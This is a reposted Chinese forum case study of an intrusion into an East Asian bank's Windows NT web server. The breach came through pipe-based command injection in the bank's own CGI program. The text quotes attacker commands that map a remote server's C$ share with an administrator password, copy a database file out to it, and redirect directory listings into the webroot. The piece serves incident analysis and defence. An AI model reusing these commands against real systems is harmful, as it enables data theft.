|
发信人: williamlong(蓝色月光) 整理人: williamlong(2001-12-17 14:28:32), 站内信件 |
| 案例分析:CNNS对去年东亚一著名银行的入侵案例分析
该网站为WindowsNT 4.0,是这个国家最大的银行之一。 该网站BankServer实际上有两道安全防线,首先在其路由器的访问控制表中(ACL)做了严格的端口过滤限制,只允许对80、443和65300进行incoming访问,另一道防火墙为全世界市场份额最大的软件防火墙FW,在FW防火墙上除了端口访问控制外,还禁止了很多异常的、利用已知CGI bug的非法调用。 在12月某日,该银行网站的系统管理员Ymouse(呢称)突然发现在任务列表中有一个杀不死的CMD.exe进程,而在BankServer系统上并没有与CMD.exe相关的服务。该系统管理员在一黑客聊天室向本站技术人员F求救。F认为这是一个典型的NT系统已经遭受入侵的迹象。 (CNNS注:入侵者若非登录本机控制台运行cmd.exe等文件,而是远程通过非法手段运行,那么这个进程通常是连系统管理员都杀不死的) 通过Email授权,F开始分析该系统的安全问题,从外部看,除WWW服务外,BankServer并没有向外开放任何有安全问题的服务。但F在该网站的上游路由器发现一个安全问题,允许入侵者获取该路由器的配置文件和破解密码。经过系统管理员Ymouse的再次授权确认,F仅用了3分钟,就获取了该路由器的访问密码; 登录路由器后,经过复杂的分析发现,虽然该银行网站没有incoming的可疑通信,却发现BankServer正在向外连接着另一台NT服务器Wserver的139端口。通过进一步的分析,证实有人从BankServer登录到了Wserver的C盘。Wserver是一台韩国的NT服务器,不受任何安全保护的裸机。F对Wserver进行了一次简单的扫描,结果意外地发现Wserver的管理员帐号的密码极为简单,可以轻易获取对该系统的完全控制。更令人吃惊的是,在这台韩国的服务器的C盘上,保存着上面提到的东亚某银行的一个重要数据库文件!更多的文件正在从BankServer上往这台韩国的Wserver上传送! 至此问题已经有了初步的轮廓。入侵者通过某种手段(最可能是利用WWW服务的漏洞),可以在BankServer上执行NT的shell指令。虽然入侵者不能直接登录BankServer的硬盘,但他入侵了另一台NT的Server,获取了该系统的管理员帐号。入侵者通过这台BankServer的shell指令(net use * \\xxx.xxx.xxx.xxx\c$ passwd /user:"administrator"),将Wserver的C盘映射成为了BankServer上的一个盘符。然后,入侵者利用copy命令,将该系统上的重要文件往Wserver上传送。但是,既然BankServer上根本没有可以登录的入口,入侵者是如何浏览BankServer上的文件系统的?他又怎么知道哪些文件才是重要的数据文件?为了找到这个问题的答案,F请Ymouse检查了一下BankServer上的web目录。Ymouse发现,在web目录下多了一个可疑的abc目录,目录中的文件全部为文本文件,分别为x1.txt、x2.txt、x3.txt......逐个检查这些文件发现,这些文件大部分是dir c:\>c:\inetpub\wwwroot\x.txt 和dir c:\data>c:\inetpub\wwwroot\x.txt 生成的结果。这些文件通过 http://BankServer/abc/x.txt 的方式可以浏览。由此可见,入侵者逐个通过一些巧妙的shell指令,不仅实现了浏览系统重要文件,而且实现了创建文件、修改文件和把文件传送出去的目的。当然入侵者也可以删除系统上的文件。看起来他几乎可以做任何事情。 为了了解入侵者是如何获取系统shell的,F让Ymouse检查了最近三天的web访问日志,幸运的是,由于系统管理员在设置系统的时候多了一个心眼,把日志目录放在E盘上,而不是象缺省的那样放在c:\winnt\system32\logfiles下面。(入侵者删除了c:\winnt\system32\logfiles下面的所有文件)入侵者似乎并没有发现这些日志。当天日志显示, http://BankServer/login/redir.exe 这个CGI程序被多次调用。在调用参数的末尾,入侵者使用了一个管道符,在管道符后面,Ymouse发现了很多shell指令,其中就包括了 copy c:\data\db1.dat h: ,其中h:盘就是韩国Wserver的C盘。这表明,入侵者正是利用 redir.exe这个程序的漏洞,实现对系统的非法调用的。redir.exe是该银行自行编写的CGI程序。 最后,还有一个问题没有明确的答案。入侵者大约在前一天删除了 c:\winnt\system32\logfiles 下面的所有文件,但删除这些文件是需要管理员的权限的。入侵者是如何获取管理员的身份执行shell指令的。Ymouse检查了IUSR_BankServer的权限,没有发现异常,IUSR_BankServer只是Domain Users和Guests两个组的成员,没有Admin的权限。又或者是系统还有更为严重的漏洞?又或者是redir.exe还有其它漏洞足以获取Admin的访问?由于该安全调查纯属免费,没有再进一步深究。 (2000年4月30日 15:05) 总结:很多人以为,有了防火墙,大多数黑客就望而却步了。实际上,防火墙对大多数黑客都是一个挑战,何况,有防火墙的网站大多是重要系统,比较容易吸引攻击。在这里,两道防火墙也没有能挡住黑客的脚步,而且,这个网站几乎没有任何的已知漏洞,问题是出在他们自己编写的程序上。网络安全绝对是一项繁重复杂的工作,要解决安全问题,绝不是一两套软件可以实现的。管理员必须明白,重要系统的安全管理,就是与黑客面对面的较量,在这场较量中要取胜,除了加强管理、钻研技术外,正确衡量自己的能力也是十分重要的。最后重复,保障安全的最好办法之一,就是请一个黑客来检查你的系统! ----  |
|
[关闭][返回] |